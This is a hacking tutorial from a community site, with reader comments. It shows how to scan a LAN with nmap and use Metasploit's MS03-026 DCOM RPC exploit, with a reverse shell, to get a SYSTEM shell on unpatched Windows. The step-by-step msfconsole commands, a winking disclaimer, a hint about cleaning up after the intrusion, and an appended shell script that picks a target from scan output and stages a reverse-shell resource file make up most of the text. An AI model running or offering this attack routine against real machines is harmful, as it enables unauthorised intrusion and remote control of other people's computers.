exploiting Windows, Linux, and Macs
For any evil genius out there, I just want to say that this tutorial is for educational purposes only, should be used with care, and must not be used against ANY server without the permission of its admin. ( * cough-cough * ) must be the bird flu.
INTRODUCTION As you might already know, many computers today ship with unpatched or misconfigured software that compromises the PC's security. The software on these computers listens on PORTS (think of a port as the channel through which information is sent to and from a program). A port by itself is not a flaw; the flaw is in the service listening behind it. If that service is vulnerable, an attacker who can reach the port can exploit it and, because many such services run with high privileges, end up as ROOT (admin, or SYSTEM on Windows). Now how do you do this, you might ask. That's why you should read on furiously, in order to find out.
PORT SCANNING One has to scan the computer they want to "hack", which requires knowing its IP address. This is usually done with a port scanner like NMAP (www.insecure.org/nmap/). To scan your whole network, for example a Verizon DSL home LAN, I would use: nmap -v 192.168.1.* (as root). If your target shows up in the list, focus the scan on its IP address, this time with more options. I usually do: nmap -v -sS -P0 -nAF 192.168.1.46 (an example victim on my LAN). Here -sS is a SYN scan (needs root), -P0 skips the ping so hosts that block ICMP still get scanned (newer nmap versions spell this -Pn), -n skips DNS lookups, -A turns on OS and version detection, and -F scans only the most common ports. The goal is to find open ports. When scanning Windows machines, I look for port 135, the Microsoft Remote Procedure Call (RPC) endpoint mapper, and try to exploit the service running behind it. The hole used below is the DCOM RPC buffer overflow from Microsoft bulletin MS03-026 (CVE-2003-0352), the same one the Blaster worm used in 2003; it only works against unpatched Windows NT 4.0, 2000, XP, and Server 2003.
METASPLOIT FRAMEWORK Let's say that port 135 is open. We will proceed to exploit the software running behind it. To do that, download the Metasploit Framework from: http://www.metasploit.com/projects/Framework/downloads.html (the commands below are for the 2.x console of that era; in Metasploit 3 and later the same exploit is exploit/windows/dcerpc/ms03_026_dcom). Install it, go to the directory containing it, and launch msfconsole. If it starts properly, your shell or CMD prompt should show:
msf >
Then type in:
msfupdate (run from your shell, not the msf prompt) - updates your exploits and payloads
show exploits - lists all available exploits
info msrpc_dcom_ms03_026 - info about the exploit
use msrpc_dcom_ms03_026 - selects the exploit
show payloads - lists the payloads this exploit can carry
info win32_reverse_ord - info about the payload (a reverse shell: the victim connects back to you, which gets through firewalls that block inbound connections)
set PAYLOAD win32_reverse_ord - selects the payload (payloads are chosen with set PAYLOAD, not use)
set RHOST 192.168.1.46 - victim's IP address
set RPORT 135 - victim's port to attack
set LHOST 192.168.1.1 - attacker's IP address, which the victim will connect back to
set LPORT 4321 - attacker's port the victim will connect back to
show options - shows the attack settings so you can check them before firing
When you're SURE/ready to perform your attack, type: exploit - BOOM! You're IN, my friend, if all went well. If it did not, the target is most likely patched, or the exploit crashed the RPC service; on Windows XP a crashed RPC service forces a reboot after a 60-second countdown, which the victim will certainly notice.
Type in: ipconfig /all - this runs on the victim, so the address it shows should be the victim's (192.168.1.46 in the example), which confirms the shell is remote and not your own box. Because the RPC service runs as LocalSystem, the shell you get runs as SYSTEM, which is above Administrator.
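The scan-then-target routine above, as an added example that is not part of the original article: a POSIX shell script that parses nmap's grepable output (-oG) for hosts reporting 135/tcp open, picks the first one, and writes a msfconsole resource script for it with the same RHOST/LHOST/LPORT settings the article types by hand. The scan output is a constructed sample, not a real scan. The module and payload names (exploit/windows/dcerpc/ms03_026_dcom, windows/shell/reverse_tcp, the RHOSTS option) are those of Metasploit 3 and later, since the 2.x names used above no longer exist; 192.168.1.1 and 4321 as the attacker's address and port are carried over from the article. The script only writes the resource file and prints the command to run it; it never launches msfconsole itself.

```sh
#!/bin/sh
# Added example, not from the original article.
# Turns the manual "scan, spot 135/tcp, set RHOST/LHOST/LPORT" routine into a
# script: parse nmap -oG output, choose a target, stage a msfconsole resource
# script. The scan file below is a constructed sample, not a real scan.
# Module/payload names are for Metasploit 3+; verify with "search ms03_026".

# hosts_with_open_port PORT FILE
# Prints every host in an nmap -oG (grepable) file that reports PORT open/tcp.
# -oG lines look like:
#   Host: 192.168.1.46 ()<TAB>Ports: 135/open/tcp//msrpc///, 139/...<TAB>Ignored State: ...
hosts_with_open_port() {
    port=$1
    file=$2
    awk -v want="$port/open/tcp" '
        /Ports:/ {
            host = $2
            rest = substr($0, index($0, "Ports:") + 6)  # text after "Ports:"
            sub(/\t.*/, "", rest)                        # drop "Ignored State" etc.
            n = split(rest, entries, ",")
            for (i = 1; i <= n; i++) {
                gsub(/^[ \t]+/, "", entries[i])
                # anchored at position 1 so 1135/open/tcp does not match 135
                if (index(entries[i], want) == 1) { print host; break }
            }
        }' "$file"
}

# write_sample_scan FILE : constructed nmap -oG output for the article's LAN.
# .46 has 135/tcp open (the case we want); .50 only shows it filtered.
write_sample_scan() {
    {
        printf '# Nmap scan (constructed sample, not real output)\n'
        printf 'Host: 192.168.1.1 ()\tStatus: Up\n'
        printf 'Host: 192.168.1.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (998)\n'
        printf 'Host: 192.168.1.46 ()\tStatus: Up\n'
        printf 'Host: 192.168.1.46 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (997)\n'
        printf 'Host: 192.168.1.50 ()\tStatus: Up\n'
        printf 'Host: 192.168.1.50 ()\tPorts: 135/filtered/tcp//msrpc///\tIgnored State: closed (999)\n'
    } > "$1"
}

# write_msf_rc RHOST LHOST LPORT FILE
# Resource script for "msfconsole -r": the same settings the article types by
# hand, with a reverse shell so the victim connects back to LHOST:LPORT.
write_msf_rc() {
    cat > "$4" <<EOF
use exploit/windows/dcerpc/ms03_026_dcom
set RHOSTS $1
set RPORT 135
set PAYLOAD windows/shell/reverse_tcp
set LHOST $2
set LPORT $3
show options
exploit
EOF
}

# stage_first_target SCANFILE LHOST LPORT RCFILE
# Picks the first host with 135/tcp open, writes the resource script, and
# prints the chosen host. Returns 1 (and writes nothing) if there is none.
stage_first_target() {
    target=$(hosts_with_open_port 135 "$1" | head -n 1)
    if [ -z "$target" ]; then
        echo "no host with 135/tcp open in $1" >&2
        return 1
    fi
    write_msf_rc "$target" "$2" "$3" "$4"
    echo "$target"
}

# Stand-alone demo on the constructed scan. The attack itself is left to the
# operator (and to an authorized target): only the next command is printed.
workdir=$(mktemp -d)
write_sample_scan "$workdir/scan.gnmap"
if victim=$(stage_first_target "$workdir/scan.gnmap" 192.168.1.1 4321 "$workdir/ms03_026.rc"); then
    echo "target: $victim"
    echo "next:   msfconsole -q -r $workdir/ms03_026.rc"
fi
```

On a real engagement the sample file is replaced by the output of something like nmap -sS -Pn -n -p 135 -oG scan.gnmap 192.168.1.0/24; the -F / -A scan from the article writes the same grepable format when given -oG. The parser deliberately matches only entries whose state is "open", so a host where 135 is merely "filtered" (a firewall in the way) is never picked as a target.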
CONCLUSION I'll assume you know how to clean up after the intrusion. So, be smart and careful about anything you do to the remote PC (since you're ROOT).
NOTE I hope you enjoyed my article (this is my first, so please take it easy on the ratings for me; I promise to make clearer ones next time). Also, this is only one exploit. There are many combinations you can use to "hack" Linux, Mac, and Windows boxes. In other words, the same routine (scan, pick an exploit for an open service, pick a payload, set the options, fire) applies whenever you're gaining root or executing arbitrary code on a remote machine.
ghost 18 years ago
Mm, I liked it, but how about writing the "how to clean up after the intrusion" part? :P At least for the case where the victim is using Linux, or Windows, or anything.
ghost 17 years ago
I don't get the "use win32_reverse_ord" command to work; are you sure that's how you use a payload? Or am I doing it wrong? :)
ghost 17 years ago
It's an alright article describing a single vector of attack. A little more background on what the exploit actually does, why RPC is vulnerable, and changing the title to reflect the coverage of a single attack would've made it much better. Anyways, it did what it set out to do, so I can't rate it anything less than good.